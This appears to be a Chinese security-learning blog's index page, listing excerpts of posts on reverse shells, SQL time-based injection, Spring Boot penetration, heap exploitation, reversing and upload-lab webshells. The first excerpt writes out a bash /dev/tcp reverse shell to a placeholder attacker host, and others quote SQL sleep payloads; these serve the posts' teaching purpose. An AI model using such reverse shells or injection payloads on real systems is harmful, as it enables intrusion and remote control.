linux/windows反弹shell的利用方式和复现 linux/windows反弹shell的利用方式和复现 1.linux反弹 1.1.Bash反弹 攻击机器命令 1nc -lvp 攻击机端口 靶机命令 1bash -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1 效果 1.2.python反弹 攻击机器命令 1nc -lvp 攻击机端口 靶机命令 1python -c "import 2021-09-22 web学习 学习 web学习
记一次实战渗透sql时间注入payload利用(select(0)from(select(sleep(6)))v) 记一次实战sql时间注入payload利用(select(0)from(select(sleep(6)))v) 0x01 前言 某次渗透,又遇到了一个AWVS的payload是 (select(0)from(select(sleep(6)))v)/*’+(select(0)from(select(sleep(6)))v)+’"+(select(0)from(select(sle 2021-09-11 web学习 学习 web学习
记一次渗透一波三折找到的springboot利用 记一次渗透一波三折找到的springboot利用 0x01 前言 在渗透某企业的时候(好久之前的了,写个总结),拐了七八个弯,终于在这个企业的某c段找到了个springboot未授权访问,真是拐了七八个弯,先从某管理系统入手,扫目录,弱密码,注入,还发现了fck文件编辑器,但是都没有用,最后还是突然发现该企业真实ip的特点->除了cdn的ip大多数都在一个ipc段,然后在某个ip找 2021-08-23 web学习 学习 web学习
记一次渗透某企业遇到的sql延时盲注启发 记一次渗透某企业遇到的sql延时盲注启发 主要是记录一下自己写的脚本2333,只能说sqlmap真不是万能的2333. 0x01 注入 首先,某站用awvs扫出来个延时注入,payload是if(now()=sysdate(),sleep(15),0),我一看这不mysql延时注入吗,直接sqlmap跑不就完事了,然而事情好像没这么简单,即使我指定了数据库是mysql,方式是延时盲 2021-08-17 web学习 学习 web学习
信息收集 信息收集 1. 厂商信息收集 1.1资产查询 启信宝: 启信宝-企业查询企业信用信息平台 (qixin.com) 天眼查:天眼查-商业查询平台企业信息查询公司查询工商查询企业信用信息系统 (tianyancha.com) 企查查:企查查-企业工商信息查询系统查企业查老板查风险就上企查查!(qcc.com) 方法:主要通过这些查询网站查询产商的信息:网站域名、app、小程序、子公司、员工信息 2021-07-28 web学习 学习 web学习
堆的House Of Force,House of spirit,Off by one 学习 0x00: 这其实是接着上个《SploitFun Linux x86 Exploit 开发系列教程》的后续实验,书上关于堆的很多漏洞现在已经不可用或需要特定环境,所以故拿ctf题目继续学习。 堆的House Of Force,House of spirit,Off by one 学习 House Of Force 漏洞原理 House Of Force 是一种堆利用方法,但是并不是说 Ho 2021-05-27 PWN学习 学习 PWN学习
《SploitFun Linux x86 Exploit 开发系列教程》学习 0x00: 其实这篇博客是后来上传的了,这居然是我们的网络攻防实验课的作业,当时我选的方向是二进制,《SploitFun Linux x86 Exploit 开发系列教程》这书确实不错,很多基本的二进制漏洞都有了,吐槽下:就是书里面很多二进制漏洞都是用的内存中的绝对地址,这意味着你要自己调试知道地址是多少,还有坑就是如果在你的环境下调试出来的地址带有/x00之类的截断字符,就有可能被截断,然后实验 2021-05-23 PWN学习 学习 PWN学习
逆向TraceMe.exe 逆向TraceMe.exe 首先我们得找到关键函数,就是关键跳,修改后能够直接破解成功的步骤,我们知道这个程序是有对话框的,所以我们在window的对话框api上下断点 首先尝试随便输入用户名和序列号 可以看到这个时候触发了断点在0x75D4E290处 直接使用f9跳转到返回的地方,跳过一些api函数后,这里这两个我认为应该都是读取对话框的函数。 我们继续单步运行,这里注意到,当运行到图 2021-05-20 逆向学习 学习 逆向学习
红日安全[代码审计]3则 红日安全[代码审计]3则 红日安全[代码审计]Day 2 – Twig 实例分析 首先安装题中给的anchor-cms-0.9.2 当我们访问一个不存在的网页时,它会显示一个404页面 这个页面的代码如下,注意这里的current_url()函数 这个函数又调用了Uri类的current()方法 在Uri类中static::$current = static::detect();又掉 2021-05-17 web学习 学习 web学习
upload-labs 学习 upload-labs 学习 Pass-1 直接上传webshell,发现报错,提示只能上传.jpg|.png|.gif类型的文件。 先把webshell的后缀改成jpg,然后上传,使用Burp抓包 圈住的地方是上传的文件名字,改成1.php,然后发送 可以看到成功上传了 使用菜刀可以成功连接 Pass-2 同样的方法,先把webshell的后缀改成jpg,然后抓包上传 这次把名 2021-05-13 web学习 学习 web学习